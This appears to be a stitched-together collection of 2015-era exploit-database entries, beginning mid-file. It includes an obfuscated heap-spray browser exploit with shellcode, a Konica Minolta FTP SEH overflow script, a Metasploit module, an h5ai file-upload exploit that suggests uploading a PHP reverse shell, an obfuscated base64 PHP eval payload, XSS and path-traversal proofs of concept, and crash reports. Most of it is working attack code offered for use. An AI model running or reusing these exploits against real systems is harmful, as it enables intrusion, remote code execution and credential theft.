this.K("ZsJjplNR");
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.WbjLbPsZ = function(arg, count) {
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";
if (size+8 >= 1024)
throw("Maximum WbjLbPsZ block size is 1008 bytes");
var count = (count ? count : 1);
for (var i = 0; i < count; i++)
this.uYiBaSLpjlOJJdhFAb(arg, "WbjLbPsZ");
this.K("WbjLbPsZ");
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.foURAtIhCeelDtsbOQrWNdbMLDvFP = function(arg)
{
var size;
if (typeof arg == "string" || arg instanceof String)
size = 4 + arg.length*2 + 2;
else
size = arg;
if ((size & 0xf) != 0)
throw "Allocation size " + size + " must be a multiple of 16";
if (size+8 >= 1024)
throw("Maximum WbjLbPsZ block size is 1008 bytes");
return this.heapBase + 0x688 + ((size+8)/8)*48;
}
GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.udIUhjCc = function(shellcode, jmpecx, size) {
var size = (size ? size : 1008);
if ((size & 0xf) != 0)
throw "Vtable size " + size + " must be a multiple of 16";
if (shellcode.length*2 > size-138)
throw("Maximum shellcode length is " + (size-138) + " bytes");
var udIUhjCc = unescape("%u9090%u7ceb")
for (var i = 0; i < 124/4; i++)
udIUhjCc += this.RBRfbU(jmpecx);
udIUhjCc += unescape("%u0028%u0028") +
shellcode + heap.zoNWUcOOYegFinTDSbOSAAM((size-138)/2 - shellcode.length);
return udIUhjCc;
}
var heap_obj = new GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl(0x10000);
var payload2 = unescape(
"%u4242%u4242%u4242%u4242%ucccc%ucccc%ucccc%ucccc%ucccc%u0c40%u0c0c%u0c44%u0c0c%u0c48%u0c0c%ue8fc%u0089%u0000%u8960%u31e5" +
"%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b" +
"%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf" +
"%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b" +
"%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd" +
"%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063" +
"");
var payload = unescape("%u0c0c%u0c0c%u0003%u0000%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
var zoNWUcOOYegFinTDSbOSAAM = unescape("%u9090%u9090");
while (zoNWUcOOYegFinTDSbOSAAM.length < 0x1000) zoNWUcOOYegFinTDSbOSAAM += zoNWUcOOYegFinTDSbOSAAM;
offset_length = 0x5F6;
junk_offset = zoNWUcOOYegFinTDSbOSAAM.substring(0, offset_length);
var shellcode = junk_offset + payload + payload2 + zoNWUcOOYegFinTDSbOSAAM.substring(0, 0x800 - payload2.length - junk_offset.length - payload.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
var block = shellcode.substring(2, 0x40000 - 0x21);
for (var i=0; i < 250; i++) {
heap_obj.uYiBaSLpjlOJJdhFAb(block);
}
ctrl.InvokeContact(202116108)
</script>
</html>
source: https://www.securityfocus.com/bid/57664/info
The WP-Table Reloaded plugin for WordPress is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
WP-Table Reloaded versions prior to 1.9.4 are vulnerable.
http://www.example.com/wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf?id=a\%22%29%29}catch%28e%29{alert%281%29}//
# Title: Konica Minolta FTP Utility - Remote Command Execution
# Date : 20/09/2015
# Author: R-73eN
# Software: Konica Minolta FTP Utility v1.0
# Tested: Windows XP SP3
# Software link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
# Every command is vulnerable to buffer overflow.
import socket
import struct
shellcode = ""#msfvenom -p windows/exec cmd=calc.exe -f python -b "\x00\x0d\x0a\x3d\x5c\x2f"
shellcode += "\xbd\xfe\xbd\x27\xc9\xda\xd8\xd9\x74\x24\xf4\x5e\x29"
shellcode += "\xc9\xb1\x31\x31\x6e\x13\x83\xee\xfc\x03\x6e\xf1\x5f"
shellcode += "\xd2\x35\xe5\x22\x1d\xc6\xf5\x42\x97\x23\xc4\x42\xc3"
shellcode += "\x20\x76\x73\x87\x65\x7a\xf8\xc5\x9d\x09\x8c\xc1\x92"
shellcode += "\xba\x3b\x34\x9c\x3b\x17\x04\xbf\xbf\x6a\x59\x1f\xfe"
shellcode += "\xa4\xac\x5e\xc7\xd9\x5d\x32\x90\x96\xf0\xa3\x95\xe3"
shellcode += "\xc8\x48\xe5\xe2\x48\xac\xbd\x05\x78\x63\xb6\x5f\x5a"
shellcode += "\x85\x1b\xd4\xd3\x9d\x78\xd1\xaa\x16\x4a\xad\x2c\xff"
shellcode += "\x83\x4e\x82\x3e\x2c\xbd\xda\x07\x8a\x5e\xa9\x71\xe9"
shellcode += "\xe3\xaa\x45\x90\x3f\x3e\x5e\x32\xcb\x98\xba\xc3\x18"
shellcode += "\x7e\x48\xcf\xd5\xf4\x16\xd3\xe8\xd9\x2c\xef\x61\xdc"
shellcode += "\xe2\x66\x31\xfb\x26\x23\xe1\x62\x7e\x89\x44\x9a\x60"
shellcode += "\x72\x38\x3e\xea\x9e\x2d\x33\xb1\xf4\xb0\xc1\xcf\xba"
shellcode += "\xb3\xd9\xcf\xea\xdb\xe8\x44\x65\x9b\xf4\x8e\xc2\x53"
shellcode += "\xbf\x93\x62\xfc\x66\x46\x37\x61\x99\xbc\x7b\x9c\x1a"
shellcode += "\x35\x03\x5b\x02\x3c\x06\x27\x84\xac\x7a\x38\x61\xd3"
shellcode += "\x29\x39\xa0\xb0\xac\xa9\x28\x19\x4b\x4a\xca\x65"
banner = ""
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
nSEH = "\xEB\x13\x90\x90"
SEH = struct.pack('<L',0x1220401E)
evil = "A" * 8343 + nSEH + SEH + "\x90" * 22 + shellcode +"D" * (950 - len(shellcode))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server = raw_input('Enter IP : ')
s.connect((server, 21))
a = s.recv(1024)
print ' [+] ' + a
s.send('User ' + evil )
print '[+] https://www.infogen.al/ [+]'
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Ftp
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow',
'Description' => %q{
This module exploits an SEH overflow in Konica Minolta FTP Server 1.00.
Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which
leads to an SEH overflow. Konica FTP allows anonymous access by default; valid
credentials are typically unnecessary to exploit this vulnerability.
},
'Author' =>
[
'Shankar Damodaran', # stack buffer overflow dos p.o.c
'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # seh overflow, metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EBD', '37908' ]
],
'Privileged' => false,
'Payload' =>
{
'Space' => 1500,
'BadChars' => "\x00\x0a\x2f\x5c",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows 7 SP1 x86',
{
'Ret' => 0x12206d9d, # ppr - KMFtpCM.dll
'Offset' => 1037
}
]
],
'DisclosureDate' => 'Aug 23 2015',
'DefaultTarget' => 0))
end
def check
connect
disconnect
if banner =~ /FTP Utility FTP server \(Version 1\.00\)/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
def exploit
connect_login
buf = rand_text(target['Offset'])
buf << generate_seh_record(target.ret)
buf << payload.encoded
buf << rand_text(3000)
print_status("Sending exploit buffer...")
send_cmd(['CWD', buf], false) # this will automatically put a space between 'CWD' and our attack string
handler
disconnect
end
end
=============================================
- Release date: 14.09.2015
- Discovered by: Dawid Golunski
- Severity: Medium/High
=============================================
I. VULNERABILITY
-------------------------
Kirby CMS <= 2.1.0 Authentication Bypass via Path Traversal
II. BACKGROUND
-------------------------
- Kirby CMS
"Kirby is a file‑based CMS
Easy to setup. Easy to use. Flexible as hell."
http://getkirby.com/
III. INTRODUCTION
-------------------------
KirbyCMS has a vulnerability that allows to bypass authentication in a hosting
environment where users within the same shared environment can save/read files
in a directory accessible by both the victim and the attacker.
IV. DESCRIPTION
-------------------------
As KirbyCMS is a file based CMS, it also stores authentication data
within files in accounts directory, each user has its own password file such as:
kirby/site/accounts/[username].php
At login, KirbyCMS refer to the password file to verify the passwor hash.
During the process, it fails to validate the resulting path to ensure that
it does not contain path traversal sequences such as '../' within the login
variable provided by a user.
This makes it vulnerable to a path traversal attack and allows to bypass
the authentication if an attacker is located in the same multi-user hosting
environment and can write files to a public directory such as /tmp accessible
by the victim site with KirbyCMS.
The exact code responsible for this vulnerability is located in
kirby/core/user.php file and is shown below:
---[ kirby/core/user.php ]---
abstract class UserAbstract {
protected $username = null;
protected $cache = array();
protected $data = null;
public function __construct($username) {
$this->username = str::lower($username);
// check if the account file exists
if(!file_exists($this->file())) {
throw new Exception('The user account could not be found');
}
...
}
protected function file() {
return kirby::instance()->roots()->accounts() . DS . $this->username() . '.php';
}
-----------------------------
In addition to the authentication bypass KirbyCMS was found to allow
authentication over HTTP protocol (resulting in passwords being sent
unencrypted), and to never expire authenticated sessions.
V. PROOF OF CONCEPT
-------------------------
KirbyCMS stores credentials in: kirby/site/accounts directory as PHP files
to prevent the contents from being accessed directly via the web server.
An example file with credentials looks as follows:
---[ victimuser.php ]---
<?php if(!defined('KIRBY')) exit ?>
username: victim
email: victim@mailserver.com
password: >
$2a$10$B3DQ5e40XQOSUDSrA4AnxeolXJNDBb5KBNfkOCKlAjznvDU7IuqpC
language: en
role: admin
------------------------
To bypass the authentication an attacker who has an account in the same
hosting environment as the victim can write the above credentials file
containing an encrypted hash of the password: trythisout
into a public directory such as:
/tmp/bypassauth.php
Because of the aformentioned Path Traversal vulnerability the attacker
can use such credentials and log in as an administrator
(via: http://victim-server.com/kirby/panel/login) with:
Username: ../../../../../../../../tmp/bypassauth
Password: trythisout
which will produce a HTTP POST request similar to:
POST /kirby/panel/login HTTP/1.1
Host: victim_kirby_site
Cookie: PHPSESSID=mqhncr49bpbgnt9kqrp055v7r6; kirby=58eddb6...
Content-Length: 149
username=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Ftmp%2Fbypassauth&password=trythisout&_csfr=erQ1UvOm2L1...
This will cause KirbyCMS to load credentials from the path:
/sites/victim/kirby/site/accounts/../../../../../../../../tmp/bypassauth.php
As a result, the attacker will get the following response:
<h2 class="hgroup hgroup-single-line cf">
<span class="hgroup-title">
<a href="#/users/edit/../../../../../../../../tmp/bypassauth">Your account</a>
</span>
<span class="hgroup-options shiv shiv-dark shiv-left">
getting access to the KirbyCMS control panel with admin rights.
VI. BUSINESS IMPACT
-------------------------
Users who make use of vulnerable versions of KirbyCMS in shared hosting
environments are at risk of having their website modified by unauthorized users.
An attacker who manages to log in as an administrator will be able to change
all the existing content as well as upload new files.
This attack could be combined with the: 'CSRF Content Upload and PHP Script
Execution' vulnerability, also discovered by Dawid Golunski and described in a
separate document.
VII. SYSTEMS AFFECTED
-------------------------
The latest version of KirbyCMS (2.1.0) was confirmed to be exploitable.
To exploit the vulnerability an attacker must be able to write a malicious
credentials file on the system in a public directory that is accessible by the
victim KirbyCMS site. This is a common situation on many hosting environments
that allow to write/read files from temporary directories such as /tmp,
/var/tmp etc.
Such file could potentially also be uploaded by other means, even if
the attacker does not have an account on the same server, such as anonymous FTP
, an email attachment which gets saved in a tmp file on the server etc.
VIII. SOLUTION
-------------------------
Upgrade to the patched version 2.1.1 released by the vendor upon this advisory.
IX. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/KirbyCMS-Path-Traversal-Authentication-Bypass-Vulnerability.txt
http://getkirby.com/
http://seclists.org/fulldisclosure/2015/Sep/index.html
http://www.securiteam.com/
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
legalhackers.com
XI. REVISION HISTORY
-------------------------
14.09.2015 - Final
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
#!/usr/bin/env python
# Exploit Title: h5ai < 0.25.0 Unrestricted File Upload
# Date: 21 September 2015
# Exploit Author: rTheory
# Vendor Homepage: https://larsjung.de/h5ai/
# Vulnerable Software Link: https://web.archive.org/web/20140208063613/http://release.larsjung.de/h5ai/h5ai-0.24.0.zip
# Vulnerable Versions: 0.22.0 - 0.24.1
# Tested on: 0.24.0 running on Apache
# CVE : 2015-3203
import urllib
import urllib2
import socket
import os
import getopt
import sys
# Globals with default options
url = ''
path = '/'
fileName = ''
filePath = ''
verboseMode = False
def header():
print '+-----------------------------------------------+'
print '| File upload exploit for h5ai v0.22.0 - 0.24.1 |'
print '| See CVE-2015-3203 for vulnerability details |'
print '+------------------- rTheory -------------------+'
def usage():
print
print 'Usage: %s -t target_url -f upload_file' % os.path.basename(__file__)
print '-t --target - The URL to connect to'
print ' ex: http://example.com'
print '-f --file - The file to upload'
print ' ex: php-reverse-shell.php'
print '-p --path - The path to upload to'
print ' Default is \'/\''
print '-v --verbose - Enable more verbose output'
print
print 'Examples:'
print '%s -t http://example.com:8080 -f php-reverse-shell.php' % os.path.basename(__file__)
print '%s -t http://192.168.1.100 -f php-reverse-shell.php -p /dir/' % os.path.basename(__file__)
sys.exit(0)
def main():
global url
global path
global fileName
global filePath
global verboseMode
header()
if not len(sys.argv[4:]):
print '[-] Incorrect number of arguments'
usage()
try:
opts, args = getopt.getopt(sys.argv[1:],"ht:f:p:v", ["help","target","file","path","verbose"])
except getopt.GetoptError as err:
print str(err)
usage()
for o,a in opts:
if o in ('-h','--help'):
usage()
elif o in ('-t','--target'):
url = a
elif o in ('-f','--file'):
fileName = a
elif o in ('-p','--path'):
path = a
elif o in ('-v','--verbose'):
verboseMode = True
else:
assert False,"Unhandled Option"
# Test target URL, target file, and path inputs for validity
if not url.startswith('http'):
print '[-] Error: Target URL must start with http:// or https://'
usage()
if not os.path.isfile(fileName):
print '[-] Error: File does not appear to exist'
usage()
if not (path.startswith('/') and path.endswith('/')):
print '[-] Error: Path must start and end with a \'/\''
usage()
# Determine target host, which is the URL minus the leading protocol
if url.find('http://') != -1:
host = url[7:]
elif url.find('https://') != -1:
host = url[8:]
else:
host = url
# Store the contents of the upload file into a string
print '[+] Reading upload file'
f = open(fileName,'r')
fileContents = f.read()
f.close()
MPFB = 'multipartformboundary1442784669030' # constant string used for MIME info
# Header information. Content-Length not needed.
http_header = {
"Host" : host,
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0",
"Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language" : "en-us,en;q=0.5",
"Accept-Encoding" : "gzip, deflate",
"Content-type" : "multipart/form-data; boundary=------" + MPFB,
"X-Requested-With" : "XMLHttpRequest",
"Referer" : url + path,
"Connection" : "keep-alive"
}
# POST parameter for file upload
payload = '--------'+MPFB+'\r\nContent-Disposition: form-data; name="action"\r\n\r\nupload\r\n'
payload += '--------'+MPFB+'\r\nContent-Disposition: form-data; name="href"\r\n\r\n'+path+'\r\n'
payload += '--------'+MPFB+'\r\nContent-Disposition: form-data; name="userfile"; filename="'+fileName+'"\r\nContent-Type: \r\n\r\n'+fileContents+'\r\n'
payload += '--------'+MPFB+'--\r\n'
socket.setdefaulttimeout(5)
opener = urllib2.build_opener()
req = urllib2.Request(url, payload, http_header)
# submit request and print output. Expected: "code 0"
try:
print '[+] Sending exploit POST request'
res = opener.open(req)
html = res.read()
if verboseMode: print '[+] Server returned: ' + html
except:
print '[-] Socket timed out, but it might still have worked...'
# close the connection
opener.close()
# Last step: check to see if the file uploaded (performed outside of this function)
filePath = url + path + fileName
print '[+] Checking to see if the file uploaded:'
print '[+] ' + filePath
def postCheck():
# Check to see if the file exists
# This may work now that everything from main() was torn down
global filePath
try:
urllib2.urlopen(filePath)
print '[+] File uploaded successfully!'
except urllib2.HTTPError, e:
print '[-] File did not appear to upload'
except urllib2.URLError, e:
print '[-] File did not appear to upload'
main()
postCheck()
Document Title:
===============
Air Drive Plus v2.4 iOS - Arbitrary File Upload Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1597
Release Date:
=============
2015-09-21
Vulnerability Laboratory ID (VL-ID):
====================================
1597
Common Vulnerability Scoring System:
====================================
8.7
Product & Service Introduction:
===============================
Turn your iPhone, iPod touch, and iPad into a wireless disk. Share your files and photos over network, no USB cable or extra software required.
(Copy of the Vendor Homepage: https://itunes.apple.com/tr/app/air-drive-plus-your-file-manager/id422806570 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an arbitrary file upload web vulnerability in the official Photo Transfer 2 - v1.0 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-09-21: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Y.K. YING
Product: Air Drive Plus - iOS Mobile (Web-Application) 2.4
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
An arbitrary file upload web vulnerability has been discovered in the official Air Drive Plus v2.4 iOS web-application.
The arbitrary file upload web vulnerability allows remote attackers to unauthorized include local file/path requests
or system specific path commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `Upload` module. Remote attackers are able to inject own files with
malicious `filename` values in the `Upload` POST method request to compromise the mobile web-application. The local file/path include
execution occcurs in the index file dir listing and sub folders of the wifi interface. The attacker is able to inject the lfi payload
by usage of the wifi interface or local file sync function.
Attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious
attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.7.
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege web-application user account.
Successful exploitation of the arbitrary file upload vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8000/)
Proof of Concept (PoC):
=======================
The arbitrary file upload web vulnerability can be exploited by remote attacker without privilege web-application user acocunt or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC Payload(s):
http://localhost:8000/AirDriveAction_file_show/%3C./[ARBITRARY FILE UPLOAD VULNERABILITY VIA FILENAME!]%20src=a%3E2.png
PoC: Source (Upload File)
<tbody id="files"><tr><td colspan="8"><a href="#" onclick="javascript:loadfiles("/AirDriveAction_ROOTLV")">.</a></td></tr><tr><td colspan="8"><a href="#" onclick="javascript:loadfiles("/AirDriveAction_UPPERLV")">..</a></td></tr><tr class=""><td><img src="./images/file.png" height="20px" width="20px"></td><td><a target="_blank" href="/AirDriveAction_file_show/68-2.png">68-2.png</a></td><td>24,27KB</td><td align="center">2015-09-11 13:13:25</td><td align="center"><a onclick="javascript:delfile("68-2.png");" class="transparent_button">Delete</a></td></tr><tr class=""><td><img src="./images/file.png" height="20px" width="20px"></td><td><a target="_blank" href="/AirDriveAction_file_show/%3C./[ARBITRARY FILE UPLOAD VULNERABILITY VIA FILENAME!]">2.png</a></td><td>538,00B</td><td align='center'>2015-09-11 13:17:21</td><td align='center'><a onclick='javascript:delfile("%3C./[ARBITRARY FILE UPLOAD VULNERABILITY VIA FILENAME!]%20src=a%3E2.png");' class='transparent_button'>Delete</a></td></tr></tbody></table></iframe></a></td></tr></tbody>
--- PoC Session Logs [POST] ---
Status: pending[]
POST http://localhost:8000/AirDriveAction_file_add Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[unknown] Mime Type[unknown]
Request Header:
Host[localhost:8000:8000]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8000/index_files.html]
POST-Daten:
POST_DATA[-----------------------------52852184124488
Content-Disposition: form-data; name="uploadfile"; filename="<?php
//Obfuscation provided by BKM - PHP Obfuscator v2.47: $kda1640d3bfb="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";@eval($kda1640d3bfb(
"JGU3NTJiNzQxMTZhYzYwMjUzMDFiYWNlOGUwZTA2YmNiPSJc ... ... ...2MVx4MzhcNjJceDMwXDY3XHgzOFw2M1x4MzlcNjBceDM3XDE0Mlx4MzZcNjdceDM5XDE0NFx4MzVcMTQzXHg2Nlw
xNDZceDY1XDYzXHgzN1wxNDEiKT8kYjdkOTFjZDYwMzJlNDRiNDgzY2Y5MGRhOWM4ZmI1MDAoKTokdTZiZmM2YmN
jZjRiMjk4ZDkyZTQzMzFhMzY3MzllMjAoKTs="));
?>
2.png"
Content-Type: image/png
Status: 200[OK]
GET http://localhost:8000/a[ARBITRARY FILE UPLOAD VULNERABILITY!] Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[unknown] Mime Type[unknown]
Request Header:
Host[localhost:8000]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8000/index_files.html]
Reference(s):
http://localhost:8000/index_files.html
http://localhost:8000/AirDriveAction_file_add/
http://1localhost:8000/AirDriveAction_file_show/
Security Risk:
==============
The security risk of the arbitrary file upload web vulnerability in the filename value is estimated as high. (CVSS 8.7)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
# EXPLOIT TITLE: Masm32v11r Buffer Overflow(SEH overwrite) crash POC
# AUTHOR: VIKRAMADITYA "-OPTIMUS"
# Date of Testing: 22nd September 2015
# Download Link : http://www.masm32.com/masmdl.htm
# Tested On : Windows 10
# Steps to Crash :-
# Step 1: Execute this python script
# Step 2: This script will create a file called MASM_crash.txt
# Step 3: Now open Masm32's QUICK EDITOR
# Step 4: Go to Script > 'Convert Text to Script'
# Step 5: Open the MASM_crash.txt to convert
# Step 6: That should crash the program .
file = open('MASM_crash.txt' , 'w');
buffer = "A"*4676 + "B"*4 + "C"*4 + "D"*500
file.write(buffer);
file.close()
/*
---------------------------------------------------------------------
Konica Minolta FTP Utility directory traversal vulnerability
Url: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
Poc: http://shinnai.altervista.org/exploits/SH-0024-20150922.html
---------------------------------------------------------------------
*/
<?php
$local_file = 'boot.ini.txt';
$server_file = '..\..\..\..\..\..\..\..\boot.ini';
$conn_id = ftp_connect($ftp_server);
$login_result = ftp_login($conn_id, "anonymous", "anonymous");
if (ftp_get($conn_id, $local_file, $server_file, FTP_BINARY)) {
echo "Successfully written to $local_file\n";
} else {
echo "There was a problem\n";
}
ftp_close($conn_id);
?>
---------------------------------------------------------------------
Title: Python 2.7 hotshot pack_string Heap Buffer Overflow
Credit: John Leitch (john@autosectools.com)
Url1: http://autosectools.com/Page/Python-hotshot-pack_string-Heap-Buffer-Overflow
Url2: http://bugs.python.org/issue24481
Resolution: Fixed
The Python 2.7 hotspot module suffer from a heap buffer overflow due to a memcpy in the pack_string function at line 633:
static int
pack_string(ProfilerObject *self, const char *s, Py_ssize_t len)
{
if (len + PISIZE + self->index >= BUFFERSIZE) {
if (flush_data(self) < 0)
return -1;
}
assert(len < INT_MAX);
if (pack_packed_int(self, (int)len) < 0)
return -1;
memcpy(self->buffer + self->index, s, len);
self->index += len;
return 0;
}
The problem arises because const char *s is variable length, while ProfilerObject.buffer is fixed-length:
typedef struct {
PyObject_HEAD
PyObject *filemap;
PyObject *logfilename;
Py_ssize_t index;
unsigned char buffer[BUFFERSIZE];
FILE *logfp;
int lineevents;
int linetimings;
int frametimings;
/* size_t filled; */
int active;
int next_fileno;
hs_time prev_timeofday;
} ProfilerObject;
An overflow can be triggered by passing a large string to the Profile.addinfo method via the value parameter:
from hotshot.stats import *
x = hotshot.Profile("A", "A")
x.addinfo("A", "A" * 0xfceb)
Which produces the following exception:
0:000> r
eax=00000041 ebx=0000fceb ecx=00003532 edx=00000002 esi=075dcb35 edi=075d9000
eip=6c29af1c esp=0027fc78 ebp=0027fc80 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSVCR90!LeadUpVec+0x70:
6c29af1c f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
0:000> db edi-0x10
075d8ff0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
075d9000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
075d9010 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
075d9020 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
075d9030 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
075d9040 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
075d9050 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
075d9060 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
0:000> db esi
075dcb35 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
075dcb45 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
075dcb55 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
075dcb65 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
075dcb75 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
075dcb85 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
